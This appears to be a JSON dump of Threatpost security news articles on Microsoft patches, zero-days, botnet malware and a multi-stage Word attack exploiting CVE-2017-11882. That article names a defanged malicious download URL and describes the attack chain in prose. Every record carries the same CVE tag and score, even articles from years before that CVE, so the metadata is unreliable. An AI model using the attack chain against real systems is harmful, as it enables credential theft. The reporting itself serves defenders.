that it wants researchers to shy away from denial-of-service testing or any type of automated testing of its services that could lead to significant traffic sent their way. Researchers are also discouraged from trying to access data belonging to someone else consuming a cloud service or expanding a test to include social engineering or phishing against Microsoft employees.\n\nMicrosoft said complete submissions can be sent to [secure@microsoft.com](<mailto:secure@microsoft.com>).\n", "cvss3": {}, "published": "2014-09-23T15:52:05", "type": "threatpost", "title": "Microsoft Online Services Bug Bounty Program Launches", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-23T19:52:05", "id": "THREATPOST:222B126A673B8B22370D386B699A7F90", "href": "https://threatpost.com/microsoft-starts-online-services-bug-bounty/108486/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:57", "description": "**UPDATE** \u2013 In an unexpected turn, Microsoft\u2019s monthly Patch Tuesday security updates released today did not include patches for Internet Explorer vulnerabilities used during the Pwn2Own contest one month ago.\n\nThe popular hacker contest attracted researchers from all over who were targeting all the major browsers, as well as third-party software such as [Flash and Java](<https://threatpost.com/firefox-java-flash-all-taken-down-pwn2own-030713/>). Companies such as VUPEN and MWR Labs were able to beat locked-down versions of [IE 10 running on Windows 8](<https://threatpost.com/pwn2own-browser-exploits-getting-harder-more-expensive-find-030613/>) and Mozilla\u2019s Firefox browser, as well as Chrome running on Windows. Unlike Mozilla and Google, both of which [patched the flaws exploited during the contest within 24 hours](<https://threatpost.com/mozilla-and-google-patch-browser-flaws-used-pwn2own-030813/>), Microsoft had yet to update its browser. 
This was compounded by last Thursday\u2019s advance notification that indicated a cumulative IE update was coming today.\n\n\u201cThis puts them quite a bit behind other browsers that already patched their Pwn2Own bugs,\u201d said Andrew Storms, director of security operations at nCircle.\n\nA Microsoft representative, along with Qualys CTO Wolfgang Kandek, said the delay is likely due to regression testing and QA work necessary for patches.\n\n\u201cMicrosoft works with the security community to protect our customers against all threats and we are investigating possible issues identified by researchers during the Pwn2Own competition. We are not aware of any attacks and the issues should not affect our customers, as Pwn2Own organizers do not publicly disclose the competition\u2019s findings,\u201d said Dustin Childs, group manager, Microsoft Trustworthy Computing.\n\nToday\u2019s IE rollup addresses a pair of critical remote code execution flaws in versions 6-10 of the browser. Both are use-after-free vulnerabilities that exist in the way IE accesses objects in memory that have been deleted. \u201cThese vulnerabilities may corrupt memory in such a way that an attacker could execute arbitrary code in the context of a user,\u201d Microsoft said in its advisory [MS13-028](<https://technet.microsoft.com/en-us/security/bulletin/ms13-028>). Users would have to be lured to a website hosting an exploit via a phishing or spam email, Microsoft said.\n\n\u201cMS13-028 has a score of \u20182\u2019 in the Exploitability Index, indicating that the construction of an exploit for the vulnerability is not entirely straightforward and not expected within the next 30 days,\u201d Kandek said.\n\nThe IE update is one of nine bulletins released today addressing 14 vulnerabilities, a relatively light month compared to the 57 updates foisted upon users in February. One other bulletin was rated critical, another remote code execution vulnerability in Microsoft Remote Desktop Client. 
[MS13-029](<https://technet.microsoft.com/en-us/security/bulletin/ms13-029>) includes patches for Remote Desktop Connection 6.1 Client and Remote Desktop Connection 7.0 Client on Windows XP, Vista and Windows 7, as well as Windows Server 2003, 2008 and 2008 R2.\n\n\u201cA remote-code execution vulnerability exists when the Remote Desktop ActiveX control, mstscax.dll, attempts to access an object in memory that has been deleted. An attacker could exploit the vulnerability by convincing the user to visit a specially crafted webpage,\u201d Microsoft said in its alert. \u201cAn attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user.\u201d\n\nRoss Barrett, senior manager of security engineering at Rapid7, said that while versions 6.1 and 7 are vulnerable, version 8 is unaffected and is not yet the default.\n\n\u201cThis issue could be triggered through an RDP link in a browser or other content. A workaround would be to set the \u2018kill-bit\u2019 for these ActiveX controls, but the update actually fixes the issue, rather than disabling the RDP control,\u201d Barrett said.\n\nStorms said there are enough mitigating circumstances to make it less problematic for most businesses.\n\n\u201cThe bug does not affect the latest RDP client, version 8, which dramatically reduces the affected number of machines,\u201d Storms said. \u201cMicrosoft has released mitigation steps to disable the affected ActiveX control. Also, if your users browse with default IE settings, they will be presented with the \u2018gold bar\u2019 warning providing them with an opportunity to opt out of an attack.\u201d\n\nThe remaining seven bulletins are rated critical by Microsoft; among them, a denial-of-service bug in Active Directory has caught experts\u2019 attention. 
[MS13-032](<https://technet.microsoft.com/en-us/security/bulletin/ms13-032>) could be triggered if an attacker sends a specially crafted query to the LDAP service that will consume CPU cycles and cause it to crash. The vulnerability affects Active Directory, Active Directory Application Mode (ADAM), Active Directory Lightweight Directory Service (AD LDS), and Active Directory Services on Microsoft Windows servers.\n\n\u201cIt should be high on the list for enterprise installations,\u201d Kandek said. \u201cAn attacker can shut down the domain controllers for an organization using only a single workstation.\u201d\n\nAmong the remaining bulletins are privilege escalation vulnerabilities and an information disclosure bug:\n\n * [MS13-030](<https://technet.microsoft.com/en-us/security/bulletin/ms13-030>) is an information-disclosure vulnerability in SharePoint that could be exploited if an attacker knew the location of a SharePoint list and gained access with legitimate credentials.\n * [MS13-031](<https://technet.microsoft.com/en-us/security/bulletin/ms13-031>) is a privilege escalation flaw in the Windows Kernel. Exploits would require valid credentials in order to carry out an attack.\n * [MS13-033](<https://technet.microsoft.com/en-us/security/bulletin/ms13-033>) affects Windows Client/Server Runtime Subsystem in the way that the system handles objects in memory. Attackers would need valid credentials and local access to pull off an exploit.\n * [MS13-034](<http://technet.microsoft.com/en-us/security/bulletin/ms13-034>) is another privilege escalation bug, this time in Windows Defender, the Microsoft antimalware client. Successful exploits could enable an attacker to run code on an infected machine, view, change or delete data or create new accounts.\n * [MS13-035](<https://technet.microsoft.com/en-us/security/bulletin/ms13-035>) repairs a vulnerability in Microsoft HTML Sanitization Component found in Microsoft Office. 
An attacker would have to send a malicious Office document to pull off an attack.\n * [MS13-036](<https://technet.microsoft.com/en-us/security/bulletin/ms13-036>) patches three vulnerabilities in Kernel Mode Driver that elevate privileges for an attacker, who must have valid credentials and local access to exploit the flaws.\n\n_This article was updated to include a comment from Microsoft._\n", "cvss3": {}, "published": "2013-04-09T19:18:19", "type": "threatpost", "title": "Pwn2Own IE Vulnerabilities Missing from Microsoft Patch Tuesday Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-18T18:36:16", "id": "THREATPOST:5C60BA94DEDFC24233F8B820C7D23076", "href": "https://threatpost.com/pwn2own-ie-vulnerabilities-missing-microsoft-patch-tuesday-updates-040913/77712/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:51", "description": "Microsoft on Tuesday released (again) the five security bulletins for its September Patch Tuesday. None of the fixes being released today is rated critical, with all five being rated important. Three of the bulletins fix flaws that could result in code execution.\n\nMicrosoft also updated the security bulletin it originally released a couple of weeks ago regarding the DigiNotar compromise, revoking trust for an additional six root certificates issued by the CA. The company removed trust for a number of certificates that were cross-signed by GTE and Entrust. 
Here is the list of certificates placed by Microsoft into the Untrusted Certificate Store:\n\n * DigiNotar Root CA\n * DigiNotar Root CA G2\n * DigiNotar PKIoverheid CA Overheid\n * DigiNotar PKIoverheid CA Organisatie \u2013 G2\n * DigiNotar PKIoverheid CA Overheid en Bedrijven\n * DigiNotar Root CA Issued by Entrust (2 certificates)*\n * DigiNotar Services 1024 CA Issued by Entrust*\n * Diginotar Cyber CA Issued by GTE CyberTrust (3 certificates)*\n\nThe five bulletins released by Microsoft on Tuesday include fixes for vulnerabilities in Windows, Office, Excel, Sharepoint and WINS. In an odd mistake, Microsoft on Friday accidentally made the link to the September bulletins live four days early. The page was only available for a short time before Microsoft removed it, but it was long enough for several sites to post the text of the advisories.\n", "cvss3": {}, "published": "2011-09-13T18:08:30", "type": "threatpost", "title": "Microsoft Releases Five Bulletins For September Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:47", "id": "THREATPOST:CC82779FBE47FD3E64708FE6233C3DAD", "href": "https://threatpost.com/microsoft-releases-five-bulletins-september-patch-tuesday-091311/75649/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:51", "description": "Microsoft is warning users about targeted attacks against a new vulnerability in several versions of Windows and Office that could allow an attacker to take over a user\u2019s machine. The bug, which is not yet patched, is being used as part of targeted attacks with malicious email attachments, mainly in the Middle East and Asia.\n\nIn the absence of a patch, Microsoft has released a FixIt tool for the vulnerability, which prevents exploits against the vulnerability from working. 
The bug affects Windows Vista, Windows Server 2008 and Microsoft Office 2003 through 2010.\n\n\u201cThe exploit requires user interaction as the attack is disguised as an email requesting potential targets to open a specially crafted Word attachment. If the attachment is opened or previewed, it attempts to exploit the vulnerability using a malformed graphics image embedded in the document. An attacker who successfully exploited the vulnerability could gain the same user rights as the logged on user,\u201d the Microsoft [advisory](<http://blogs.technet.com/b/msrc/archive/2013/11/05/microsoft-releases-security-advisory-2896666-v2.aspx>) says.\n\nThe vulnerability doesn\u2019t affect the current versions of Windows, the company said, and users who are running potentially vulnerable products can take a couple of actions in order to protect themselves. Installing the [FixIt tool](<http://technet.microsoft.com/en-us/security/advisory/2896666>) will help prevent exploitation, as will deploying the Enhanced Mitigation Experience Toolkit (EMET), which helps mitigate exploits against certain classes of bugs.\n\n\u201cThe vulnerability is a remote code execution vulnerability that exists in the way affected components handle specially crafted TIFF images. An attacker could exploit this vulnerability by convincing a user to preview or open a specially crafted email message, open a specially crafted file, or browse specially crafted web content. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. 
Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\u201d Microsoft officials said.\n", "cvss3": {}, "published": "2013-11-05T14:07:32", "type": "threatpost", "title": "Microsoft Warns of Targeted Attacks on Windows 0-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-11-05T19:07:32", "id": "THREATPOST:DF45F7CBB6E670440E0A14E517EA753D", "href": "https://threatpost.com/microsoft-warns-of-targeted-attacks-on-windows-0-day/102821/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:38", "description": "Everyone knows that the first year of marriage can be a tough one \u2013 around three percent of them end in the first 12 months. Looks like the same can be true of malware marriages, with the union of the Zeus and SpyEye Trojans now in question.\n\nJust one year after news broke that the Zeus and SpyEye Trojan families had merged, virus experts say there\u2019s reason to question whether the union is still intact.\n\nResearchers at Microsoft and Kaspersky Lab told Threatpost that, although there\u2019s clearly evidence that code was shared between the two malware families, the rumored merger of Zeus and SpyEye never took place. In fact, the two botnets continue as separate entities, with some researchers wondering if they are even controlled by the same individuals or criminal groups.\n\nZeus and SpyEye were the two main families of botnet software, with SpyEye [playing the role of upstart competitor to the more established Zeus](<https://threatpost.com/tracker-spyeye-not-yet-zeus-stature-110910/>). 
For a while, the competition for online hosts was intense, with [both malware families adding features to remove the other on systems they infected](<https://threatpost.com/malware-trojan-wars-spyeye-vs-zeus-040110/>).\n\nThat rivalry seemed to end in October, 2010, when researchers observed what appeared to be a merger of the two crime kits, around the same time that the author of the Zeus botnet decided to release the malware code as an open source repository. Those reports were backed by online forum posts by the SpyEye author claiming that the Zeus source code had been turned over to him and that the two Trojans [would soon be \u201cmerged into one powerful Trojan](<http://krebsonsecurity.com/2010/10/spyeye-v-zeus-rivalry-ends-in-quiet-merger/>).\u201d\n\nBy the end of 2010, an update to the SpyEye crimeware toolkit (1.3.X) included a feature, formerly unique to the Zeus crime kit, that targeted an anti-Trojan agent developed by the firm Trusteer. The new version of SpyEye also removed a feature to remove the Zeus malware if it was found running on the affected machine, Microsoft said.\n\nDespite some early reports that a merged SpyEye/Zeus Trojan was circulating online, the promised merger never happened, beyond some basic cutting and pasting of code. In fact, subsequent reports suggested that the two malware families were [continuing down separate tracks, with Zeus adding new features not seen in the other](<https://threatpost.com/zeus-malware-not-dead-yet-new-features-being-added-030411/>).\n\nNow Microsoft says that reports of the merger may have been overblown. 
In a post Tuesday on the company\u2019s Threat Research and Response Blog, researchers said that they considered reports of the union to be \u201cspeculative\u201d and saw little evidence that Zeus and SpyEye were sharing code.\n\nThe company declined to discuss the specifics of its research, but stood by the statement in its blog post.\n\nDmitry Tarakanov, a researcher at Kaspersky Lab who has studied the two families, said that there was a code transfer from Zeus to SpyEye in the immediate aftermath of the source code being transferred to the SpyEye author. For example, the SpyEye author grabbed a Zeus feature that allowed the malware to force Web browsers on infected systems to load malicious HTML served by the botnet, even in cases where the host had a recent version of the page in question (say, an electronic banking site) stored locally in its browser cache. \u201cSpyEye could not intercept the cached html-code,\u201d Tarakanov wrote in an e-mail. \u201cSo the author of Spyeye had seen that part of the code where Zeus replaces the cache as well and added that part of code into his own source code of SpyEye.\u201d\n\nBut there\u2019s little evidence of further consolidation of the two code bases after that, he said. \u201cWe can make a conclusion that author of SpyEye did not even try to concoct one bot squeezing all the best from two source codes,\u201d he wrote.\n\nTarakanov said he believes the original author of Zeus was interested in washing his hands of the malware industry, especially with increased attention to the Zeus malware by law enforcement. In September, 2010, more than 60 individuals were charged in the U.S. and U.K. for crimes linked to the Zeus botnet. That may have chased the bot\u2019s original author into hiding.\n\nHuman nature may explain the SpyEye author\u2019s failure to carry out a grand union of the two botnets that was originally promised. \u201cPeople tend not to change work,\u201d Tarakanov wrote. 
In other words: \u2018if it ain\u2019t broke, don\u2019t fix it,\u2019 as the saying goes.\n\nHowever, it\u2019s harder to explain the subsequent modifications to the Zeus code, which Tarakanov said are \u201ctoo serious and notable\u201d to be the work of amateurs. While it\u2019s possible that the SpyEye author would choose to keep the malware families separate, it\u2019s harder to understand why new features added to Zeus weren\u2019t also added to SpyEye. \u201cA programmer really does not like to code one thing twice. So, it\u2019s hard to believe that the author of SpyEye somehow developed new features (but different) for SpyEye and for Zeus,\u201d he wrote.\n\nOne possibility is that both tools are being offered to cyber criminals simultaneously, rather than requiring any one set of customers to abandon their platform of choice, or asking everyone to switch to a new, merged platform. Aviv Raff, the CTO of Seculert, said in June that his researchers had found [evidence of back-end servers that are being used to host both the Zeus and SpyEye crimeware packs](<https://threatpost.com/malware-exploit-kit-writers-merging-their-talents-062411/>). Attackers who are interested in using one or the other can have their choice of which tool they\u2019d like to use at any given time, said Raff, who expects greater convergence of crime kits like SpyEye and Zeus and Web exploit kits in the future. \n\nIt\u2019s also possible that main development of Zeus has been passed to a third party now that the malware source code is available online. \u201cThe situation is too muddy and there are too many conflicting arguments,\u201d Tarakanov said. 
\n", "cvss3": {}, "published": "2011-10-14T17:58:10", "type": "threatpost", "title": "SpyEye and Zeus Malware: Married Or Living Separately?", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:35", "id": "THREATPOST:9C03EBE552C67EF6E62604A81CF13C1A", "href": "https://threatpost.com/spyeye-and-zeus-malware-married-or-living-separately-101411/75755/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:54", "description": "Microsoft has released a new version of the MS13-036 patch that was causing some customers\u2019 machines to crash. The company had recommended in the days after the original fix was first released that customers [uninstall the MS13-036 patch](<http://threatpost.com/microsoft-uninstall-faulty-patch-tuesday-security-update-041213/>) while Microsoft investigated the cause of the problems.\n\nThe new fix that Microsoft released on Tuesday resolves some conflicts with third-party applications that apparently were causing the blue screen issues for some people. The company didn\u2019t specify which software was causing the crashes, but said that the update should resolve the problems.\n\n\u201cWe\u2019ve determined that the update, when paired with certain third-party software, can cause system errors,\u201d said Trustworthy Computing group manager Dustin Childs at the time that the patch was recalled earlier this month.\n\nThe MS13-036 patch fixes a pair of race condition vulnerabilities in the Windows kernel, both of which could be used for code execution. 
However, the patch was rated important rather than critical because an attacker would need physical access to a vulnerable machine in order to run code using one of these bugs.\n\nChilds said in a blog post Tuesday that customers should install the revised update as soon as possible.\n\n\u201cAs we [previously discussed](<http://blogs.technet.com/b/msrc/archive/2013/04/11/kb2839011-released-to-address-security-bulletin-update-issue.aspx> \"previously discussed\" ), we stopped distributing this update when we learned some customers were having issues. The new update, [KB2840149](<http://support.microsoft.com/kb/2840149> \"KB2840149\" ), still addresses the Moderate security issue described in MS13-036, and should not cause these issues. If you have automatic updates enabled, you won\u2019t need to take any actions. For those manually updating, we encourage you to apply this update at your earliest convenience,\u201d he said.\n", "cvss3": {}, "published": "2013-04-24T10:00:23", "type": "threatpost", "title": "Microsoft Releases Updated MS13-036 Patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-24T14:02:36", "id": "THREATPOST:2C798ED7D1CE36B13D82410EA1C94D9F", "href": "https://threatpost.com/microsoft-releases-updated-ms13-036-patch/99885/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:17", "description": "Microsoft will release on Tuesday guidelines for developers building online applications and for those using the Agile code-development process. 
The Agile guidelines apply principles from Microsoft\u2019s Security Development Lifecycle (SDL) to Agile, an umbrella term for a development model frequently used for Web-based applications released under short deadlines, called \u201csprints.\u201d [Read the full article](<http://www.computerworld.com/s/article/9140543/Microsoft_to_release_security_guidelines_for_Agile>). [Computerworld]\n", "cvss3": {}, "published": "2009-11-09T18:26:11", "type": "threatpost", "title": "Microsoft to Give Security Guidelines for Agile", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:14:29", "id": "THREATPOST:F68D705DC9A7663E4BF22574470F51D7", "href": "https://threatpost.com/microsoft-give-security-guidelines-agile-110909/73057/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:14", "description": "Microsoft has released a beta version of a new tool that can help victims of malware attacks recover from ugly infections, even if they don\u2019t have the ability to reach the Internet. The Windows Defender Offline tool enables users to clean their systems of malware from a CD or other removable media.\n\nIn some ways, the new tool is a throwback to the bygone days of computing and viruses when the malware universe was small enough that all of the definitions to combat it could fit on a floppy disk. Back then, users would often have a rescue disk that could help them boot their PC in the event of a messy malware infestation. 
Microsoft\u2019s [Windows Defender Offline](<http://windows.microsoft.com/en-US/windows/what-is-windows-defender-offline>) uses the same idea, by enabling users to download a large definition file and then transfer it to a USB drive, CD or other portable medium.\n\nThere are some pernicious classes of malware, including some rootkits and ransomware programs, that will prevent users from accessing the Internet or doing any kind of normal operations on their PCs. In those cases, it can be difficult or impossible for a user to run a system scan with installed antimalware applications or run a scan from the Web.\n\nA user who finds herself in such a situation would be able to boot her PC from the CD or USB driver containing the offline tool and then proceed with the malware cleaning.\n\n\u201cWindows Defender Offline Beta can help remove such hard to find malicious and potentially unwanted programs using definitions that recognize threats. Definitions are files that provide an encyclopedia of potential software threats. Because new threats appear daily, it\u2019s important to always have the most up-to-date definitions installed in Windows Defender Offline Beta. 
Armed with definition files, Windows Defender Offline Beta can detect malicious and potentially unwanted software, and then notify you of the risks,\u201d Microsoft\u2019s documentation for the Windows Defender Offline tool says.\n\nThe new tool is currently in beta form, but it\u2019s available for download from Microsoft\u2019s site now.\n", "cvss3": {}, "published": "2011-12-09T12:57:19", "type": "threatpost", "title": "Microsoft Unveils New Windows Defender Offline Tool", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:11", "id": "THREATPOST:2E13C5A3F37F020F188FBBE61F9209BC", "href": "https://threatpost.com/microsoft-unveils-new-windows-defender-offline-tool-120911/75979/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:02", "description": "Microsoft today warned that hackers are using rigged QuickTime media files to exploit an unpatched vulnerability in DirectShow, the APIs used by Windows programs for multimedia support.\n\nThe company has activated its security response process to deal with the zero-day attacks and has issued a pre-patch advisory with workarounds and a one-click \u201cfix it\u201d feature to enable the mitigations.\n\nFrom the [advisory](<http://www.microsoft.com/technet/security/advisory/971778.mspx>):\n\nMicrosoft is aware of limited, active attacks that use this exploit code. 
While our investigation is ongoing, our investigation so far has shown that Windows 2000 Service Pack 4, Windows XP, and Windows Server 2003 are vulnerable; all versions of Windows Vista and Windows Server 2008 are not vulnerable.\n\nAn entry on the MSRC blog provides [more details](<http://blogs.technet.com/msrc/archive/2009/05/28/microsoft-security-advisory-971778-vulnerability-in-microsoft-directshow-released.aspx>):\n\nThe vulnerability is in the QuickTime parser in Microsoft DirectShow. An attacker would try and exploit the vulnerability by crafting a specially formed video file and then posting it on a website or sending it as an attachment in e-mail. While this isn\u2019t a browser vulnerability, because the vulnerability is in DirectShow, a browser-based vector is potentially accessible through any browser using media plug-ins that use DirectShow. Also, we\u2019ve verified that it is possible to direct calls to DirectShow specifically, even if Apple\u2019s QuickTime (which is not vulnerable) is installed.\n\nInterestingly, the vulnerable component was removed from Windows Vista and later operating systems but is still available for use in the Microsoft Windows 2000, Windows XP, and Windows Server 2003 operating systems.\n\nVulnerable Windows users should immediately consider disabling QuickTime parsing to thwart attackers. 
This [KB article provides a fix-it button](<http://support.microsoft.com/kb/971778>) that automatically enables the workaround.\n\nIt also provides detailed instructions on using a managed script deployment for Windows shops.\n\nAlso see the [Security Research and Defense blog](<http://blogs.technet.com/srd/archive/2009/05/28/new-vulnerability-in-quicktime-parsing.aspx>) for more information.\n", "cvss3": {}, "published": "2009-05-28T21:16:23", "type": "threatpost", "title": "Microsoft warns of dangerous DirectShow flaw, attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:08", "id": "THREATPOST:88A5449B2DE22E7A3AD1C820BEDE1109", "href": "https://threatpost.com/microsoft-warns-dangerous-directshow-flaw-attacks-052809/72744/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:53", "description": "The attackers behind Flame can easily clean up compromised computers, according to research by security firm Symantec, which found that some attackers have been able to use command-and-control (C&C) servers to completely remove the malware from certain machines.\n\nAccording to a post on [Symantec\u2019s Security Response blog](<https://threatpost.com/attackers-can-use-self-destruct-feature-kill-flame-060812/>) yesterday, C&C servers can send a file to infected computers to \u201cuninstall\u201d the Flame malware. The file, Browse32.ocx, then goes on to search the infected computer for every file used by Flame, removes them and even overwrites the disk with random bits of information and characters to cover its tracks.\n\nAccording to Symantec\u2019s analysis, the module contains two different exports: EnableBrowser, which initializes the module, and StartBrowse, which does the actual deletion of the Flame files. 
Symantec also adds that the module appears to have been created on May 9 and looks similar to SUICIDE, an older module previously found in Flame\u2019s code.\n\nFlame was discovered in recent months and [disclosed by the Iranian government and western firms last week](<https://threatpost.com/whats-meaning-flame-malware-052912/>). The worm quickly drew comparisons to Stuxnet and Duqu. While the malware has apparently existed for years, it wasn\u2019t until this week that it was revealed the attackers [used a collision attack](<https://threatpost.com/microsoft-details-flame-hash-collision-attack-060612/>) to get the malware to [exploit a fraudulent certificate](<https://threatpost.com/flame-malware-uses-forged-microsoft-certificate-validate-components-060412/>) from Microsoft to attack Windows systems.\n", "cvss3": {}, "published": "2012-06-08T17:32:37", "type": "threatpost", "title": "Attackers Can Use 'Self-Destruct' Feature to Kill Flame", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:05", "id": "THREATPOST:6E2DD8B76555337B1AB3A01AE147EA68", "href": "https://threatpost.com/attackers-can-use-self-destruct-feature-kill-flame-060812/76669/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:27:45", "description": "Typically, inbox-based attacks that include malicious Microsoft Office attachments require adversaries to trick users into enabling macros. But researchers say they have identified a new malicious email campaign that uses booby-trapped Office attachments that are macro-free.\n\nThe attacks do not generate the same type of default warning from Microsoft associated with macro-based attacks, according to research published Wednesday by [Trustwave\u2019s SpiderLabs](<https://www.trustwave.com/Resources/SpiderLabs-Blog/Multi-Stage-Email-Word-Attack-without-Macros/>). 
When opening attachments, there are no warnings or pop-ups alerting victims, researchers said.\n\nThe attack uses malicious Word attachments that activate a four-stage infection process that ultimately exploits the [Office Equation Editor vulnerability](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) ([CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>)), patched last year by Microsoft. The payload is designed to steal credentials from the victim\u2019s email, FTP and browsers.\n\nResearchers emphasized the layered nature of the attack, comparing it to a turducken, a holiday dish that stuffs a chicken into a duck, and then into a turkey.\n\n\u201cThis \u2018turducken\u2019 attack really exploits CVE-2017-11882 in the end to obtain code execution,\u201d Trustwave researchers told Threatpost in an email response to questions. Systems that have patched for CVE-2017-11882 are not vulnerable.\n\nResearchers at Trustwave said the malware infection chain uses a combination of techniques that start with a .DOCX formatted attachment. The spam originates from the Necurs botnet. Email subject lines fall into four financially related categories: \u201cTNT STATEMENT OF ACCOUNT\u201d, \u201cRequest for Quotation\u201d, \u201cTelex Transfer Notification\u201d and \u201cSWIFT COPY FOR BALANCE PAYMENT\u201d. 
All of the emails examined by SpiderLabs researchers had the attachment named \u201creceipt.docx\u201d.\n\n**The Turducken Attack**\n\nThe four-stage infection process begins when the .DOCX file is opened and triggers an embedded OLE (Object Linking and Embedding) object that contains external references.\n\n\u201cThis \u2018feature\u2019 allows external access to remote OLE objects to be referenced in the document.xml.rels,\u201d researchers wrote.\n\nAccording to SpiderLabs, attackers are taking advantage of the fact that Word (or .DOCX formatted) documents created using Microsoft Office 2007 use the \u201c[Open XML Format](<https://msdn.microsoft.com/en-us/library/bb448854\\(v=office.12\\).aspx>)\u201c. The format is based on XML and ZIP archive technologies and can easily be manipulated programmatically or manually, said researchers.\n\nStage two includes the .DOCX file triggering the download of an RTF (rich text file format) file.\n\n\u201cWhen user opens the DOCX file, it causes a remote document file to be accessed from the URL: hxxp://gamestoredownload[.]download/WS-word2017pa[.]doc. This is actually a RTF file that is downloaded and executed,\u201d researchers describe.\n\n**Equation Editor Exploited**\n\nIt\u2019s the RTF file that exploits the Office Equation Editor vulnerability (CVE-2017-11882). In November, Microsoft patched the vulnerability. The Microsoft Equation Editor is installed by default with the Office suite. The application is used to insert and edit complex equations as OLE items in Microsoft Word documents.\n\nStage three includes the decoding of text inside the RTF file that in turn triggers an MSHTA command line that downloads and executes an HTML executable (HTA) file. 
Next the HTA contains an obfuscated PowerShell Script which eventually downloads and executes the remote payload \u2013 the Password Stealer Malware.\n\n\u201cThe malware steals credentials from email, ftp, and browser programs by concatenating available strings in the memory and usage of the APIs RegOpenKeyExW and PathFileExistsW to check if registry or paths of various programs exist,\u201d said researchers.\n\nResearchers note the number of stages and vectors used in these attacks is unusual. \u201cAnother noticeable point is that the attack uses file types (DOCX, RTF and HTA), that are not often blocked by email or network gateways unlike the more obvious scripting languages like VBS, JScript or WSF,\u201d researchers noted. \u201cIn the end, be wary of unknown or unexpected Office documents and keep your patches up to date.\u201d\n", "cvss3": {}, "published": "2018-02-15T12:31:26", "type": "threatpost", "title": "Word-based Malware Attack Doesn\u2019t Use Macros", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-02-15T12:31:26", "id": "THREATPOST:B4579714760429B9531FF0E79E44C578", "href": "https://threatpost.com/word-based-malware-attack-doesnt-use-macros/129969/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:01", "description": "MIAMI BEACH\u2013It\u2019s been a decade now since Microsoft began focusing on product security as a top priority and there have been a lot of successes and some failures along the way. But in that time, one of the things that most definitely has changed as a result of the Trustworthy Computing program is how difficult and expensive it\u2019s become for attackers to compromise Windows machines. That\u2019s not to say, however, that the fight has been won. 
It\u2019s only beginning, in fact, a senior Microsoft security official said.\n\nThere are a lot of bits and pieces that comprise [Microsoft\u2019s Trustworthy Computing](<https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/>) efforts, from developer training to exploit mitigations to outreach to the security researchers who spend their time attacking the company\u2019s products. But the one thing that all of these initiatives have in common is that they\u2019re focused on increasing the time, effort and investment it takes for an attacker to compromise one of their products. Increasing that degree of difficulty and level of spending by even small increments can provide much larger gains on the defensive side.\n\n\u201cFor stealthy, reliable exploits, you need a lot of R&D and they\u2019re shorter-lived now. It\u2019s getting harder to find bugs and exploits,\u201d Andrew Cushman, senior director of Trustworthy Computing security at Microsoft, said in his keynote talk at the Infiltrate conference here Friday. \u201cThe defender\u2019s ethos is to increase attacker investment. Copy what works and keep plugging away. We\u2019re in this for the long haul.\u201d\n\nAlthough the famous directive from Bill Gates on Trustworthy Computing went out in 2002, one of the first real watershed moments in the company\u2019s efforts to lock down its products was the release of Windows XP SP2 in 2004. That was the first version of the OS to have the Windows firewall turned on by default, and included some other security upgrades as well. Cushman pointed to that as an inflection point for both Microsoft and the attackers who target its 